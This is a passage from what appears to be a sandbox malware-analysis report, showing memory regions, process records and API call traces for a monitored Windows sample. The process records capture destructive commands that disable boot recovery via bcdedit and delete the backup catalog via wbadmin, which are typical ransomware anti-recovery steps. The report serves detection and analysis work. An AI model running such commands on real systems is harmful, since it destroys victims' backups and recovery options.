"\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2032 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2033 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2034 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2035 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2036 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2037 start_va = 0x220000 end_va = 0x286fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2038 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2039 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2040 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2041 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2042 start_va = 0x290000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2043 start_va = 0x290000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2044 start_va = 0x430000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 2045 start_va = 0x440000 end_va = 0x4fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 106 os_tid = 0xce4 Process: id = "13" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x34361000" os_pid = "0xce0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xd48" cmd_line = "bcdedit /set {default} recoveryenabled no" cur_dir = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f39c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2046 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2047 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2048 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2049 start_va = 0x1e0000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2050 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2051 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2052 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2053 start_va = 0xff6f0000 end_va = 0xff746fff monitored = 0 entry_point = 0xff7196b8 region_type = mapped_file name = "bcdedit.exe" filename = "\\Windows\\System32\\bcdedit.exe" (normalized: "c:\\windows\\system32\\bcdedit.exe") Region: id = 2054 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2055 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2056 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2057 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2058 start_va = 0x260000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 2059 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2060 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2061 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2062 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2063 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2064 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2065 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2066 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2067 start_va = 0x7feff430000 end_va = 0x7feff50afff monitored = 0 entry_point = 0x7feff450760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2068 start_va = 0x7fefee80000 end_va = 0x7fefee9efff monitored = 0 entry_point = 0x7fefee860e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2069 start_va = 0x7fefdb50000 end_va = 0x7fefdc7cfff monitored = 0 entry_point = 0x7fefdb9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2070 start_va = 0xc0000 end_va = 0x11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2071 start_va = 0x260000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 2072 start_va = 0x420000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 2073 start_va = 0x120000 end_va = 0x1dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 107 os_tid = 0xd68 Process: id = "14" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x34fa7000" os_pid = "0xd60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xed8" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C wbadmin delete catalog -quiet" cur_dir = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f39c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2075 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2076 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2077 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2078 start_va = 0xc0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2079 start_va = 0x49fc0000 end_va = 0x4a018fff monitored = 1 entry_point = 0x49fc90b4 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 2080 start_va = 0x77830000 end_va = 0x779d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2081 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2082 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2083 start_va = 0x7feffb50000 end_va = 0x7feffb50fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2084 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2085 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2086 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2087 start_va = 0x1c0000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2088 start_va = 0x77710000 end_va = 0x7782efff monitored = 0 entry_point = 0x77725340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2089 start_va = 0x7fefd910000 end_va = 0x7fefd97bfff monitored = 0 entry_point = 0x7fefd912780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2090 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2091 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2092 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2093 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2094 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2095 start_va = 0x7feff100000 end_va = 0x7feff19efff monitored = 0 entry_point = 0x7feff1025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2096 start_va = 0x7fef28d0000 end_va = 0x7fef28d7fff monitored = 0 entry_point = 0x7fef28d11a0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 2097 start_va = 0x77610000 end_va = 0x77709fff monitored = 0 entry_point = 0x7762a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2098 start_va = 0x7feff1c0000 end_va = 0x7feff226fff monitored = 0 entry_point = 0x7feff1cb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2099 start_va = 0x7feff350000 end_va = 0x7feff35dfff monitored = 0 entry_point = 0x7feff351080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2100 start_va = 0x7feff690000 end_va = 0x7feff758fff monitored = 0 entry_point = 0x7feff70a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2101 start_va = 0x350000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 2102 start_va = 0x350000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 2103 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2104 start_va = 0x1c0000 end_va = 0x1e8fff monitored = 0 entry_point = 0x1c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2105 start_va = 0x250000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2106 start_va = 0x4e0000 end_va = 0x667fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 2107 start_va = 0x1c0000 end_va = 0x1e8fff monitored = 0 entry_point = 0x1c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2108 start_va = 0x7feff400000 end_va = 0x7feff42dfff monitored = 0 entry_point = 0x7feff401010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2109 start_va = 0x7feff9d0000 end_va = 0x7feffad8fff monitored = 0 entry_point = 0x7feff9d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2110 start_va = 0x670000 end_va = 0x7f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 2111 start_va = 0x800000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 2112 start_va = 0x1c0000 end_va = 0x1dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 2113 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2114 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2115 start_va = 0x1c00000 end_va = 0x1ecefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 109 os_tid = 0xd64 [0150.690] GetProcAddress (hModule=0x77710000, lpProcName="SetConsoleInputExeNameW") returned 0x77720c80 [0150.690] GetProcessHeap () returned 0x250000 [0150.690] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x26c5f0 [0150.690] GetProcessHeap () returned 0x250000 [0150.690] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26c5f0 | out: hHeap=0x250000) returned 1 [0150.691] _wcsicmp (_String1="wbadmin", _String2=")") returned 78 [0150.691] _wcsicmp (_String1="FOR", _String2="wbadmin") returned -17 [0150.691] _wcsicmp (_String1="FOR/?", _String2="wbadmin") returned -17 [0150.691] _wcsicmp (_String1="IF", _String2="wbadmin") returned -14 [0150.691] _wcsicmp (_String1="IF/?", _String2="wbadmin") returned -14 [0150.691] _wcsicmp (_String1="REM", _String2="wbadmin") returned -5 [0150.691] _wcsicmp (_String1="REM/?", _String2="wbadmin") returned -5 [0150.691] GetProcessHeap () returned 0x250000 [0150.691] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x269d30 [0150.692] GetProcessHeap () returned 0x250000 [0150.692] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x20) returned 0x2646c0 [0150.692] GetProcessHeap () returned 0x250000 [0150.692] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3e) returned 0x269df0 [0150.694] GetConsoleTitleW (in: lpConsoleTitle=0x1bf500, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0150.694] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0150.694] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0150.694] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0150.694] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0150.694] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0150.694] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0150.695] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0150.695] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0150.695] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0150.695] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0150.695] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0150.695] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0150.695] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0150.695] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0150.695] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0150.695] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0150.695] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0150.695] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0150.695] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0150.695] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0150.695] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0150.695] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0150.695] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0150.695] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0150.695] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0150.695] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0150.695] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0150.695] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0150.695] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0150.696] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0150.696] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0150.696] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0150.696] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0150.696] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0150.696] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0150.696] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0150.696] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0150.696] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0150.696] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0150.696] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0150.696] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0150.696] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0150.696] _wcsicmp (_String1="wbadmin", _String2="DIR") returned 19 [0150.696] _wcsicmp (_String1="wbadmin", _String2="ERASE") returned 18 [0150.696] _wcsicmp (_String1="wbadmin", _String2="DEL") returned 19 [0150.696] _wcsicmp (_String1="wbadmin", _String2="TYPE") returned 3 [0150.696] _wcsicmp (_String1="wbadmin", _String2="COPY") returned 20 [0150.696] _wcsicmp (_String1="wbadmin", _String2="CD") returned 20 [0150.696] _wcsicmp (_String1="wbadmin", _String2="CHDIR") returned 20 [0150.696] _wcsicmp (_String1="wbadmin", _String2="RENAME") returned 5 [0150.696] _wcsicmp (_String1="wbadmin", _String2="REN") returned 5 [0150.697] _wcsicmp (_String1="wbadmin", _String2="ECHO") returned 18 [0150.697] _wcsicmp (_String1="wbadmin", _String2="SET") returned 4 [0150.697] _wcsicmp (_String1="wbadmin", _String2="PAUSE") returned 7 [0150.697] _wcsicmp (_String1="wbadmin", _String2="DATE") returned 19 [0150.697] _wcsicmp (_String1="wbadmin", _String2="TIME") returned 3 [0150.697] _wcsicmp (_String1="wbadmin", _String2="PROMPT") returned 7 [0150.697] _wcsicmp (_String1="wbadmin", _String2="MD") returned 10 [0150.697] _wcsicmp (_String1="wbadmin", _String2="MKDIR") returned 10 [0150.697] _wcsicmp (_String1="wbadmin", _String2="RD") returned 5 [0150.697] _wcsicmp (_String1="wbadmin", _String2="RMDIR") returned 5 [0150.697] _wcsicmp (_String1="wbadmin", _String2="PATH") returned 7 [0150.697] _wcsicmp (_String1="wbadmin", _String2="GOTO") returned 16 [0150.697] _wcsicmp (_String1="wbadmin", _String2="SHIFT") returned 4 [0150.697] _wcsicmp (_String1="wbadmin", _String2="CLS") returned 20 [0150.697] _wcsicmp (_String1="wbadmin", _String2="CALL") returned 20 [0150.697] _wcsicmp (_String1="wbadmin", _String2="VERIFY") returned 1 [0150.697] _wcsicmp (_String1="wbadmin", _String2="VER") returned 1 [0150.697] _wcsicmp (_String1="wbadmin", _String2="VOL") returned 1 [0150.697] _wcsicmp (_String1="wbadmin", _String2="EXIT") returned 18 [0150.697] _wcsicmp (_String1="wbadmin", _String2="SETLOCAL") returned 4 [0150.697] _wcsicmp (_String1="wbadmin", _String2="ENDLOCAL") returned 18 [0150.698] _wcsicmp (_String1="wbadmin", _String2="TITLE") returned 3 [0150.698] _wcsicmp (_String1="wbadmin", _String2="START") returned 4 [0150.698] _wcsicmp (_String1="wbadmin", _String2="DPATH") returned 19 [0150.698] _wcsicmp (_String1="wbadmin", _String2="KEYS") returned 12 [0150.698] _wcsicmp (_String1="wbadmin", _String2="MOVE") returned 10 [0150.698] _wcsicmp (_String1="wbadmin", _String2="PUSHD") returned 7 [0150.698] _wcsicmp (_String1="wbadmin", _String2="POPD") returned 7 [0150.698] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0150.698] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0150.698] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0150.698] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0150.698] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0150.698] _wcsicmp (_String1="wbadmin", _String2="FOR") returned 17 [0150.698] _wcsicmp (_String1="wbadmin", _String2="IF") returned 14 [0150.698] _wcsicmp (_String1="wbadmin", _String2="REM") returned 5 [0150.699] GetProcessHeap () returned 0x250000 [0150.699] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x269e40 [0150.699] GetProcessHeap () returned 0x250000 [0150.699] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4e) returned 0x26a060 [0150.699] _wcsnicmp (_String1="wbad", _String2="cmd ", _MaxCount=0x4) returned 20 [0150.699] GetProcessHeap () returned 0x250000 [0150.699] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x420) returned 0x251320 [0150.700] SetErrorMode (uMode=0x0) returned 0x0 [0150.700] SetErrorMode (uMode=0x1) returned 0x0 [0150.700] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x251330, lpFilePart=0x1bed90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x1bed90*="Roaming") returned 0x22 [0150.700] SetErrorMode (uMode=0x0) returned 0x1 [0150.700] GetProcessHeap () returned 0x250000 [0150.700] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x251320, Size=0x66) returned 0x251320 [0150.700] GetProcessHeap () returned 0x250000 [0150.700] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x251320) returned 0x66 [0150.700] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fef360, nSize=0x2000 | out: lpBuffer="") returned 0xc8 [0150.700] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0150.700] GetProcessHeap () returned 0x250000 [0150.701] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1ec) returned 0x26a0c0 [0150.701] GetProcessHeap () returned 0x250000 [0150.701] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x3c8) returned 0x2513a0 [0150.712] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2513a0, Size=0x1ee) returned 0x2513a0 [0150.712] GetProcessHeap () returned 0x250000 [0150.712] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x2513a0) returned 0x1ee [0150.712] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fef360, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0150.712] GetProcessHeap () returned 0x250000 [0150.712] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xe8) returned 0x2515a0 [0150.712] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2515a0, Size=0x7e) returned 0x2515a0 [0150.712] GetProcessHeap () returned 0x250000 [0150.712] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x2515a0) returned 0x7e [0150.713] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.714] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\wbadmin.*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\wbadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x1beb00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 